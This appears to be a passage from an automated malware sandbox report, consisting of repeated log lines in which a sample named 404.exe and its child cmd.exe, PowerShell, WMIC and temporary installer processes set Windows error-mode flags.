Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
